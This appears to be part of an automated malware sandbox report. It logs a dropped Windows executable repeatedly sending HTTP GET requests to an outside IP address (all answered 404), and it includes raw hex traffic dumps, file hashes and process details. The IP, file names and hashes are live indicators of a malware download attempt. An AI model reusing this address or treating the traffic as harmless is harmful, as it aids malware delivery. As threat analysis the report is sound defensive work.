49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78
                                                                        Data Ascii: JM%O;hb>q|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;*Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb |Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z*!U2;}`Iy2&`h[~W1z[bb7ox
                                                                        Apr 24, 2024 10:10:17.378703117 CEST1289INData Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df
                                                                        Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
                                                                        Apr 24, 2024 10:10:17.378834963 CEST1289INData Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f
                                                                        Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
                                                                        Apr 24, 2024 10:10:17.378910065 CEST1289INData Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d
                                                                        Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
                                                                        Apr 24, 2024 10:10:17.378927946 CEST1289INData Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52
                                                                        Data Ascii: hi|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
                                                                        Apr 24, 2024 10:10:17.378948927 CEST1289INData Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b
                                                                        Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,*#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]*!qk%wDv
                                                                        Apr 24, 2024 10:10:17.378984928 CEST1289INData Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29
                                                                        Data Ascii: ySDY'|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
                                                                        Apr 24, 2024 10:10:17.379548073 CEST1289INData Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d
                                                                        Data Ascii: zX*ZrE@97M,RgdnfHX|dgA}3^0J?+i-${*2|w'yc|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m|'D^
                                                                        Apr 24, 2024 10:10:17.379601002 CEST1289INData Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5
                                                                        Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
                                                                        Apr 24, 2024 10:10:17.379618883 CEST1289INData Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9
                                                                        Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut|.G%umnnfE~dT=D-%7}=]V#+W$Bh
                                                                        Apr 24, 2024 10:10:17.714423895 CEST1289INData Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a
                                                                        Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.649768185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:19.750055075 CEST166OUTGET /2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:20.087399960 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:19 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.649769185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:22.452941895 CEST166OUTGET /3 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:22.788122892 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:22 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.649771185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:25.150958061 CEST166OUTGET /4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:25.485863924 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.649772185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:27.839699984 CEST166OUTGET /5 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:28.177259922 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:27 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.649773185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:30.542294025 CEST166OUTGET /6 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:30.878624916 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:30 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:10:06:53
                                                                        Start date:24/04/2024
                                                                        Path:C:\Users\user\Desktop\957C4XK6Lt.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\957C4XK6Lt.exe"
                                                                        Imagebase:0x530000
                                                                        File size:10'240 bytes
                                                                        MD5 hash:F33C75710D0E0463A2528E619C2EE382
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:10:06:59
                                                                        Start date:24/04/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        Imagebase:0x400000
                                                                        File size:86'016 bytes
                                                                        MD5 hash:36010B83BCCFCD1032971DF9FC5082A1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
